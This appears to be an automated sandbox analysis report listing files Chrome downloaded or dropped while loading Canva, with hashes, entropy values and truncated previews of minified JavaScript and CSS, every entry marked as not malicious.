                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[9630],{../***/ 79194:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var Li;var sqa,tqa,uqa,vi,wi,xi,yi,zi,vqa,yqa,wqa,zqa,xqa,Fi,Bqa;sqa=function(a){return(null==a?0:null!=a.D1)?a.D1():a};__c.ri=function(a){if(null==a||null==a.D1)return a;a=a.D1();return a instanceof HTMLElement?a:null};.__c.si=function(a,{Zp:b}){const [c,d]=(0,__c.Kc)(null),e=__c.cb().direction;(0,__c.Jc)(()=>{const f=__c.ri(c);if(f){var g=new __c.Id(f,{Aea:!b});a.forEach(([h,k,l])=>{h=__c.lb(h,e);h.GQa=null===l||void 0===l?void 0:l.GQa;"function"===typeof k?g.addListener("keydown",h,k):(k.Zva&&g.addListener("keydown",h,k.Zva),k.lfa&&g.addListener("keyup",h,k.lfa),k.$va&&g.addListener("keypress",h,k.$va))});return()=>{g.reset()}}},[e,b,a,c]);
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65455)
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):205770
                                                                                                                                                                                                                                                                    Entropy (8bit):5.280944208455833
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3072:xRuYsuJpRRFqGTljz2zheWjMsoWuZe+qn1oWR9pvu:rpRR0GTl/2MWAsopsr1Rru
                                                                                                                                                                                                                                                                    MD5:AF2FE7BB481ACFBD2A36BC7510332BF4
                                                                                                                                                                                                                                                                    SHA1:49907978018F91904F23318040D9CD818B9155FD
                                                                                                                                                                                                                                                                    SHA-256:A721EA558E145AEA18DB697C9EECE393958C05E2031DFACC07994616D3CDB936
                                                                                                                                                                                                                                                                    SHA-512:DDEFE45FFD6F38E03564FB97CDA2E071C50571F3D24C51A40CBBB5D4C219DD2810384689EDFABC3C9507D1B2485458DE772823C1C584ECC4DFA14C9800AA5F91
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:/*! For license information please see 4af0e43f4ef393f1.vendor.js.LICENSE.txt */."use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[2653],{40749:(e,t,n)=>{n.d(t,{Q:()=>a});var r=n(366995);function a(e){var t=e.children,n=e.render,a=t||n;return"function"!=typeof a?null:(0,r.S)(a)}a.displayName="Observer"},736241:(e,t,n)=>{n.d(t,{DT:()=>o.D,FY:()=>o.F,Pi:()=>u.P,Qj:()=>s.Q,fv:()=>c.f,jd:()=>l.O});n(454648);var r,a=n(404935),i=n(695578),o=(n(366995),n(775328)),l=n(751586),u=n(364620),s=n(40749),c=n(818321);n(948591),n(24765);(0,i.z0)(a.m);r=l.O.finalizeAllImmediately},364620:(e,t,n)=>{n.d(t,{P:()=>d});var r,a,i=n(875604),o=n(775328),l=n(366995),u="function"==typeof Symbol&&Symbol.for,s=null!==(a=null===(r=Object.getOwnPropertyDescriptor((function(){}),"name"))||void 0===r?void 0:r.configurable)&&void 0!==a&&a,c=u?Symbol.for("react.forward_ref"):"function"==typeof i.forwardRef&&(0,i.forwardRef)((function(e){return null})).$$typeof,f=u?Symbol.for("react.memo")
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):177
                                                                                                                                                                                                                                                                    Entropy (8bit):5.227126458414223
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3:Ns5UwJAD501TRwVON+auKbtTJj1XBFJEEaMwFO/Ypf7WTtGlT9UtLy:WNAKR7sHKJTJjRBXYbMU+I
                                                                                                                                                                                                                                                                    MD5:0491C3E235B132CD7F471352C499AF60
                                                                                                                                                                                                                                                                    SHA1:164C68057A07A33ACA85B8B459B6417B7F2BC273
                                                                                                                                                                                                                                                                    SHA-256:3A763E57583973B6C0E9F30DB1AC53DF11362290AD65CC7B77D8AC0DC34CC4DE
                                                                                                                                                                                                                                                                    SHA-512:91F3E0EDB0E848136147F042F450F5603C9EE5C824FB593FA0843D84C14733454AD6169CFDBAACAC19DE674F45260F6E3B9E249796ED97460C132E50DA2A3867
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/d34caaf7c270c576.ltr.css
                                                                                                                                                                                                                                                                    Preview:.lRiAhg{height:100vh;left:0;position:fixed;top:0;width:100vw}.IRiUGg{pointer-events:none}.FJA3UA{display:contents}./*# sourceMappingURL=sourcemaps/d34caaf7c270c576.ltr.css.map*/
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4079)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):9332
                                                                                                                                                                                                                                                                    Entropy (8bit):5.541697704610075
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:CYXIL+NCJaNOiN8NOcs44pWhaQRkmIYGdDGYwtP:CYvCJInqb74AOmgGYs
                                                                                                                                                                                                                                                                    MD5:A0956E34DFF831D857230DFC5A56E21E
                                                                                                                                                                                                                                                                    SHA1:C688DB94FDB4144DDED05313EF8EE8CA24A83B04
                                                                                                                                                                                                                                                                    SHA-256:DC25421D6C8C2D6CAA1828A7B77DB222563E0E6AE897B1C69EEA6D586BF19AF0
                                                                                                                                                                                                                                                                    SHA-512:C3D75FCD969FECF710C64CE2EF9F88F5F38B0A751242B7BEEB8021A4B75F1E6E9C3897484230965887AA754B959C44F1E459DFD2C7C4D14F89ACAF0FFF14DAFE
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://chunk-composing.canva.com/chunk-batch/0009a6e8ae11a411.ltr.css+b9997efbfcc9862a.ltr.css+4217645fff8006fa.ltr.css+44120d0e86f58fdd.ltr.css+70f83d7290d33057.ltr.css
                                                                                                                                                                                                                                                                    Preview:/* __FILE_CONTENT_FOR__:0009a6e8ae11a411.ltr.css */..nMvVqA{display:grid;grid-template-areas:"corner-block horizontal-headers" "vertical-headers sheet";grid-template-columns:auto 1fr;grid-template-rows:auto 1fr;position:relative}.nMvVqA.H2wykw{direction:ltr}.nMvVqA.UweldA{direction:rtl}.rsTRSA{background:#fff;grid-area:corner-block;position:sticky;top:0}.rsTRSA.H2wykw{left:0}.rsTRSA.UweldA{right:0}._32sKQw{grid-area:horizontal-headers;top:0}._32sKQw,.xdIsTQ{background:#fff;position:sticky}.xdIsTQ{grid-area:vertical-headers}.xdIsTQ.H2wykw{left:0}.xdIsTQ.UweldA{right:0}.Gdl7fQ,._0YOFPg{grid-area:sheet}.Gdl7fQ{height:100%;pointer-events:none;position:absolute;top:0;width:100%}.Gdl7fQ.H2wykw{left:0}.Gdl7fQ.UweldA{right:0}.xhBZaw{display:flex}.xhBZaw.jNbTIg{direction:ltr}.xhBZaw.gtA7Dw{direction:rtl}.Vt2_4w{display:flex;pointer-events:all}.Vt2_4w.jNbTIg{direction:ltr}.Vt2_4w.gtA7Dw{direction:rtl}.An9VeA{display:flex;flex-direction:column}._93roJg{pointer-events:all}.Tn3nUw{position:sticky;z
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2200)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):11142
                                                                                                                                                                                                                                                                    Entropy (8bit):5.31739747905786
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:fL1AdpM4UOi1MhKqKzbWDThTI7E7wnLjunj9KNfM7k2RXZ0wcTqRGaubS:fL1YMDOi1uKqKzbWDThTmEkLjunpofMz
                                                                                                                                                                                                                                                                    MD5:0A5B04B991FA42E0D9ABCEF0B0109428
                                                                                                                                                                                                                                                                    SHA1:BFFECB1F316B78DFDB15F0FA430C99C39F2AC214
                                                                                                                                                                                                                                                                    SHA-256:4A70AF94E6A936ABDE696205B28B4709AC956CD222290EE8AC54C2C558A716BE
                                                                                                                                                                                                                                                                    SHA-512:F642BBC3C33B1BCA766D0624E5A659D9F3E047CC33A44EBD4AF731EF44D63F3D5D552814AB171471D0D603853D80BFCA8B5B9452E6F8E632D3C2BDFDF4B6AC7D
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/f2b916a20536621e.js
                                                                                                                                                                                                                                                                    Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6264],{../***/ 9164:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f7853dc7660378a038952b53c0953e = self._45f7853dc7660378a038952b53c0953e || {};(function(__c) {var Ca=__c.Ca;var rQa,QA,RA,sQa,uQa,UA,xQa,wQa,yQa,zQa,AQa,VA,BQa,XA;rQa=function(a){return a instanceof Error?"QuotaExceededError"===a.name||a instanceof DOMException&&22===a.code||a instanceof qQa:!1};QA=function(a){const b=Error(a);return c=>{c instanceof Error&&(null==c.stack||""===c.stack)&&(c.stack=b.stack);return c}};.RA=function(a){return new Promise((b,c)=>{const d=()=>{a.removeEventListener("success",e);a.removeEventListener("error",g)},e=()=>{d();b(a.result)},f=QA("idb promisify_request_events error"),g=()=>{d();c(f(a.error))};a.addEventListener("success",e);a.addEventListener("error",g)})};sQa=async function(a,b){const c=a.xn(a.curs
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8084), with no line terminators
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):8084
                                                                                                                                                                                                                                                                    Entropy (8bit):5.762075254521524
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:192:0NNvS+7dDu8Pfpam9PU0dLlaVB+AQf+Mu3Y:0nvS+7dDu8PfwcLlOhQf+M
                                                                                                                                                                                                                                                                    MD5:1B1B2E141F5D225FB108FEA71D9CEEF5
                                                                                                                                                                                                                                                                    SHA1:698C0E841C0CA6D6970A9EE7F4AF5A0FD8D2813B
                                                                                                                                                                                                                                                                    SHA-256:EA91B265CD1505E504A3E24CF8D9DF11E7B6BCF13D668912CAE55855F26ACFC8
                                                                                                                                                                                                                                                                    SHA-512:37ACA1B4850C64D2608D952AC310C0359B0EF653C1B197319F1DE89E751A46B2005F687F50411BD6A2EFBA51684820851664F55C9060F92C397F7EFF25DB2DA1
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:window._cf_chl_opt={cFPWv:'b'};~function(V,h,i,j,k,l,s,v){V=b,function(c,e,U,f,g){for(U=b,f=c();!![];)try{if(g=-parseInt(U(495))/1+-parseInt(U(489))/2+parseInt(U(397))/3+-parseInt(U(479))/4+parseInt(U(432))/5*(-parseInt(U(480))/6)+-parseInt(U(408))/7*(-parseInt(U(497))/8)+-parseInt(U(404))/9*(-parseInt(U(473))/10),e===g)break;else f.push(f.shift())}catch(D){f.push(f.shift())}}(a,471909),h=this||self,i=h[V(419)],j=function(W,e,f,g){return W=V,e=String[W(444)],f={'h':function(D){return D==null?'':f.g(D,6,function(E,X){return X=b,X(409)[X(441)](E)})},'g':function(D,E,F,Y,G,H,I,J,K,L,M,N,O,P,Q,R,S,T){if(Y=W,D==null)return'';for(H={},I={},J='',K=2,L=3,M=2,N=[],O=0,P=0,Q=0;Q<D[Y(427)];Q+=1)if(R=D[Y(441)](Q),Object[Y(465)][Y(456)][Y(490)](H,R)||(H[R]=L++,I[R]=!0),S=J+R,Object[Y(465)][Y(456)][Y(490)](H,S))J=S;else{if(Object[Y(465)][Y(456)][Y(490)](I,J)){if(256>J[Y(485)](0)){for(G=0;G<M;O<<=1,E-1==P?(P=0,N[Y(395)](F(O)),O=0):P++,G++);for(T=J[Y(485)](0),G=0;8>G;O=O<<1|T&1.35,E-1==P?(P=0,N[Y(395)
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8364)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):8427
                                                                                                                                                                                                                                                                    Entropy (8bit):5.695576419085213
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:96:cllLka2gWuuM1BnIN04GAancEth2LTO0OtTpTUr9oH6tlWDn17Hc9093eXu7Bg/b:ayg1RXyu2RoH6LQRplGk43c/Zc
                                                                                                                                                                                                                                                                    MD5:ABB678F59043822A9A8406A9E9F8841D
                                                                                                                                                                                                                                                                    SHA1:3EFFEC2C4DE44AC6AB21ACDB84C74D43D10B22FC
                                                                                                                                                                                                                                                                    SHA-256:4DC4600C48879E6AAD34FE982B5055F42453DC5403507EC2C10712A9A6FFF141
                                                                                                                                                                                                                                                                    SHA-512:258B31E893C96BF3A5294CC6975FB027E43C3BF403F24A28057908749F27181456AD8E3F988C6B051D3EAB77AF9EB63E2DA2F3744974136F27BF181B4CC456C3
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/40fff0481e1704cd.ltr.css
                                                                                                                                                                                                                                                                    Preview:._pFsfA{clip:rect(1px,1px,1px,1px);border:0;font-size:0;height:1px;left:0;margin:-1px;overflow:hidden;padding:0;position:absolute;top:0;white-space:nowrap;width:1px}.DcyBDA{display:flex;height:100%;place-items:center;width:100%}.light{--Wc1zKQ:rgba(64,87,109,.07)}.dark{--Wc1zKQ:hsla(0,0%,100%,.15)}.gr4YYw{direction:ltr;display:inline-flex}.gr4YYw .FLBiAQ{margin:0 2px}.gr4YYw .FLBiAQ:first-child{margin-left:0}.gr4YYw .FLBiAQ:last-child{margin-right:0}.FLBiAQ{border-radius:4px;box-sizing:border-box;display:inline-block}.FLBiAQ.Iu18wQ{height:16px;line-height:16px;padding:0 4px}.FLBiAQ._3L5FYw{height:24px;line-height:24px;padding:0 8px}.FLBiAQ.g5oiAA{padding:0;text-align:center}.FLBiAQ.Iu18wQ.g5oiAA{width:16px}.FLBiAQ._3L5FYw.g5oiAA{width:24px}.FLBiAQ{background-color:var(--Wc1zKQ);color:var(--VNXpSw)}._69rf1g{background:var(--4RaSjg);border-radius:8px;box-shadow:inset 0 0 0 1px var(--OuCkCQ);box-sizing:border-box;display:flex;flex-direction:row;max-width:256px;min-height:24px;padding:4px
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):354
                                                                                                                                                                                                                                                                    Entropy (8bit):5.6762578005096325
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6:YkHKKF7r48evSQNWKtI3s0ud9lbpYhF81ExPA6WrGbfm4XCE2p64phvxg7h+7uH1:YkqmXnwScWKwwlF+F81ExPA3Cmamp62S
                                                                                                                                                                                                                                                                    MD5:B4F9F0DD587C5ABE6708F44A6E11A53F
                                                                                                                                                                                                                                                                    SHA1:28EBFA68F92AE2A96354521FFAD38A3DBE647154
                                                                                                                                                                                                                                                                    SHA-256:CCC37C837397D66FD8E0FACFE001CE7FC9F87E48089D73540AD2C2DD95716D04
                                                                                                                                                                                                                                                                    SHA-512:D471D889D8EAE3E9190B39376C29400D5AB9BF3C47897B64DC278E4E58314A78F148A44BB315D51591CA5384EAE505AD411BEF7AA706FDD5678023109A809425
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://cdn.metadata.io/pixel/config/1721.json
                                                                                                                                                                                                                                                                    Preview:{"pixelJwt": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJwaXhlbCBjb25maWciLCJuYW1lIjoiQ2FudmEgSW5jLiIsImlzcyI6Im1ldGFkYXRhIGluYy4iLCJhdWQiOiIxNzIxIiwiZXhwIjoxNzY3MTE5NDAwLCJpYXQiOjE3MjExMzcxMDYsIm5iZiI6MTcxOTc3MjIwMCwiY29sbGVjdEluc2lnaHRzIjowLCJwYWNrYWdlIjoiRlVMTF9GVU5DVElPTkFMSVRZIiwiaXNfcGxnIjoiMCJ9.wMldEMSftyWmTu8VELd7xI0gDpqzWR64-SlbjetKBO8"}.
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1915)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):1978
                                                                                                                                                                                                                                                                    Entropy (8bit):5.480761253814918
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:48:o2E1aXkkgX0wM+QDyrJCGUKYBtEk1f5PCKWVNqZ:1qrkgXNIDyrBU3LEk1fxKNs
                                                                                                                                                                                                                                                                    MD5:C3AE5AC8DFAAFDE7A9683B6C61183974
                                                                                                                                                                                                                                                                    SHA1:C4F1834C432806CF7D996EE4458FF7BE38CE1923
                                                                                                                                                                                                                                                                    SHA-256:90E34FCC9A349A8A2A27F232A88CB47791FD609DC6FDFFEFE968E30BDA4A27C0
                                                                                                                                                                                                                                                                    SHA-512:30DEBF27DA75D1A3EA20144B95023DBFC6A2C555149145B1735787247EEDB715100257513DBA1F14C09F9C37216F9543D09E0CAE79DD7399AF6E8D7EE77F9279
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/web/f2ae43eac10a5a36.ltr.css
                                                                                                                                                                                                                                                                    Preview:.l_P_rQ{display:grid;height:100%}.j1Zvgw{grid-template-columns:minmax(0,1fr) minmax(0,1fr)}.f_S0rw{overflow-x:hidden;overflow-y:auto;-webkit-user-select:text;user-select:text}.XDn20w{height:calc(100% - 64px);margin:32px}.XDn20w,.njRegQ{display:flex;flex-direction:column}.njRegQ{flex-grow:1;margin:24px}._1pVD2w,.e59rVw{height:592px;max-height:90vh;max-width:95vw;overflow-y:auto;width:384px}.ctzgyg{width:100%}@media (min-width:900px){._1pVD2w{width:768px}}.j55oqg{display:flex;min-height:90vh}.NTyjhA{display:grid}.NTyjhA.zU__lg{grid-gap:4px}.NTyjhA.mhmgXA{grid-gap:8px}.NTyjhA.tJWhNQ{grid-gap:8px;grid-auto-columns:-webkit-max-content;grid-auto-columns:max-content;grid-auto-flow:column}.RX4d5g{margin-left:-16px;margin-right:-16px}.A_H5UA{border:0;border-radius:0;display:grid;grid-auto-columns:minmax(0,1fr);height:auto;min-height:40px;padding:8px 16px;text-align:start}.tJWhNQ .A_H5UA{min-width:40px;text-align:center}.cIkTdg .A_H5UA{border-radius:8px}.A_H5UA:focus{outline:2px auto -webkit-foc
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (55289)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):55418
                                                                                                                                                                                                                                                                    Entropy (8bit):5.2011745666689
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:768:7Snb/BBuuGki0usgH8bdwB005NLqrbcSb4sA7CctFzBmBv4L7HelSWVoz8WlqdLZ:70q8berM2bW6X49yWx1ZSDh/33s
                                                                                                                                                                                                                                                                    MD5:16E5D529039D25735AE0BA1D610125E8
                                                                                                                                                                                                                                                                    SHA1:D7CAA746424A018583EC1E097F74A484C4FB1811
                                                                                                                                                                                                                                                                    SHA-256:C6DE703F8EE214808496DCD92795AC8971782935ED75ABDD5624C814E69DAAEA
                                                                                                                                                                                                                                                                    SHA-512:56AC6CDABC05070E1440C8CA4A60119B3555B2743BA8652A2A0282701ECC8E150AC343020D620D3F5CD6406F04966CDE54FD797530149AD0B2711E44F89165D0
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://static.canva.com/static/lib/sentry/7.16.0.min.js
                                                                                                                                                                                                                                                                    Preview:/*! @sentry/browser 7.16.0 (5386ce7) | https://github.com/getsentry/sentry-javascript */.var Sentry=function(t){const n=Object.prototype.toString;function e(t){switch(n.call(t)){case"[object Error]":case"[object Exception]":case"[object DOMException]":return!0;default:return h(t,Error)}}function r(t,e){return n.call(t)===`[object ${e}]`}function i(t){return r(t,"ErrorEvent")}function s(t){return r(t,"DOMError")}function o(t){return r(t,"String")}function c(t){return null===t||"object"!=typeof t&&"function"!=typeof t}function u(t){return r(t,"Object")}function a(t){return"undefined"!=typeof Event&&h(t,Event)}function f(t){return Boolean(t&&t.then&&"function"==typeof t.then)}function h(t,n){try{return t instanceof n}catch(t){return!1}}function l(t){return t&&t.Math==Math?t:void 0}const d="object"==typeof globalThis&&l(globalThis)||"object"==typeof window&&l(window)||"object"==typeof self&&l(self)||"object"==typeof global&&l(global)||function(){return this}()||{};function p(t,n,e){const r
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2757)
                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                    Size (bytes):231267
                                                                                                                                                                                                                                                                    Entropy (8bit):5.54737566767261
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:6144:VhwaRvMw6xJ5wht2A415QyqVho8HMTm8UuCKu1QQ6vx:VpRvZtvA5QyqccyhUuCKHjx
                                                                                                                                                                                                                                                                    MD5:CDE48D600D3D13B4DDD41D9C3FDD6E93
                                                                                                                                                                                                                                                                    SHA1:A708F93F6D2B16DA020FB7DD614A44757AFF940E
                                                                                                                                                                                                                                                                    SHA-256:64B6E146C196F9809E6AFF54E16317D3FCC032799AEC56B009C817646042DB18
                                                                                                                                                                                                                                                                    SHA-512:1E3F92E87F2E9759FA79FE2DEF3601026203E95C53E86D21954DD38C33D5CE06F4C9A9C434AA3937677A25852FAEF0452EF93A926CF938EBE6F967A284431D8E
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    URL:https://accounts.google.com/gsi/client
                                                                                                                                                                                                                                                                    Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x1cc88000, 0x18c1, ]);.var aa,ba,ca,da,t,ea,ha,na,oa;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writa
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (19948), with no line terminators
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):19948
                                                                                                                                                                                                                                                                    Entropy (8bit):5.261902742187293
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:384:XriNpnjyMkg8XMtExRN1w29JIOzahXtO2nJ65:GijgSWuanfJ65
                                                                                                                                                                                                                                                                    MD5:EC18AF6D41F6F278B6AED3BDABFFA7BC
                                                                                                                                                                                                                                                                    SHA1:62C9E2CAB76B888829F3C5335E91C320B22329AE
                                                                                                                                                                                                                                                                    SHA-256:8A18D13015336BC184819A5A768447462202EF3105EC511BF42ED8304A7ED94F
                                                                                                                                                                                                                                                                    SHA-512:669B0E9A545057ACBDD3B4C8D1D2811EAF4C776F679DA1083E591FF38AE7684467ABACEF5AF3D4AABD9FB7C335692DBCA0DEF63DDAC2CD28D8E14E95680C3511
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:!function(){var e={343:function(e){"use strict";for(var t=[],n=0;n<256;++n)t[n]=(n+256).toString(16).substr(1);e.exports=function(e,n){var r=n||0,i=t;return[i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],"-",i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]],i[e[r++]]].join("")}},944:function(e){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof window.msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto);if(t){var n=new Uint8Array(16);e.exports=function(){return t(n),n}}else{var r=new Array(16);e.exports=function(){for(var e,t=0;t<16;t++)0==(3&t)&&(e=4294967296*Math.random()),r[t]=e>>>((3&t)<<3)&255;return r}}},508:function(e,t,n){"use strict";var r=n(944),i=n(343);e.exports=function(e,t,n){var o=t&&n||0;"string"==typeof e&&(t="binary"===e?new Array(16):null,e=null);var a=(e=e||{}).random||(e.rng||r)();if(
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                    Size (bytes):115121
                                                                                                                                                                                                                                                                    Entropy (8bit):5.371362815606401
                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                    SSDEEP:3072:tX/OXPeGcbWUc/0aHscJYoJyhVVh5XGsj56pY5TS2z5frSiqdE:tX/sPbcbWUXaHscGoIhVVHXGqSK5frf/
                                                                                                                                                                                                                                                                    MD5:CB1826AF86C8190CEB1FF4F70E255C6D
                                                                                                                                                                                                                                                                    SHA1:83057F32ACAA0D277001D22AEAEC60D141281C3E
                                                                                                                                                                                                                                                                    SHA-256:34E60C5656534222F02FC99959F0B48D191CE8A6CF8CC78DCFDA19A794FAED9F
                                                                                                                                                                                                                                                                    SHA-512:BA5F119FD4C74B74E310A3EB6451B117F564634208B9D20259D554A3D8749E17ACC39D3DBD2B82DEC7426ADFE4ED61EA24919B9ECEB6EF06BF837491A180D9DB
                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                    Preview:"use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5136],{899171:(t,e,i)=>{i.d(e,{Z:()=>s});const s={Tn:function(t){const e=(t+"=".repeat((4-t.length%4)%4)).replace(/\-/g,"+").replace(/_/g,"/"),i=atob(e),s=new Uint8Array(i.length);for(let n=0;n<i.length;++n)s[n]=i.charCodeAt(n);return s}}},576196:(t,e,i)=>{i.d(e,{G:()=>s});const s={CustomEvent:"ce",Pr:"p",_u:"pc",vc:"ca",Ea:"i",qs:"ie",M:"cci",R:"ccic",I:"ccc",F:"ccd",ql:"ss",xl:"se",Oi:"si",Ei:"sc",Gi:"sbc",Cc:"sfe",mo:"iec",Uu:"lr",zu:"uae",O:"ci",$:"cc",Ju:"lcaa",Eu:"lcar",On:"inc",Ln:"add",Rn:"rem",$n:"set",Bn:"ncam",Ku:"sgu",Fr:"ffi"}},876055:(t,e,i)=>{i.d(e,{Z:()=>s});const s={W:function(){const t=(t=!1)=>{const e=(Math.random().toString(16)+"000000000").substr(2,8);return t?"-"+e.substr(0,4)+"-"+e.substr(4,4):e};return t()+t(!0)+t(!0)+t()}}},19601:(t,e,i)=>{i.d(e,{Z:()=>s});class s{constructor(t,e){this.database=t,this.vd=e,this.parent="undefined"==typeof window?self:window,this.database=t,this.vd=
                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2969)
                                                                                                                                                                                                                                                                    Category:downloaded
